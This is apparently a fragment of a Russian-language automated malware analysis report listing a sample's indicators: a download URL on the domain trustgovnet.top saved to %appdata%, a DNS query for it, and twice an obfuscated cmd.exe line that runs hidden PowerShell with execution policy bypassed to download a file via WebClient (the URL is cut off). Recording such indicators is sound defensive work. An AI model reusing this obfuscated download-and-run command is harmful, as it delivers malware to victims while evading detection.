Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^ER^s^H^e^lL.eX^E^ ^-^E^X^EcUt^I^o^nP^o^lI^cY ^BYpa^Ss ^-nOp^rO^f^IlE^ ^-^wI^N^d^O^ws^TYL^E^ HiDdEn ^(^Ne^W^-^ObjE^ct^ ^s^Y^sTe^M^.n^eT.wEb^clI^En^t^)^.^Do^WNL^oAD^F^ilE(^'http:/...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "PoW^ER^s^H^e^lL.eX^E^ ^-^E^X^EcUt^I^o^nP^o^lI^cY ^BYpa^Ss ^-nOp^rO^f^IlE^ ^-^wI^N^d^O^ws^TYL^E^ HiDdEn ^(^Ne^W^-^ObjE^ct^ ^s^Y^sTe^M^.n^eT.wEb^clI^En^t^)^.^Do^WNL^oAD^F^ilE(^'http:/...' (со скрытым окном)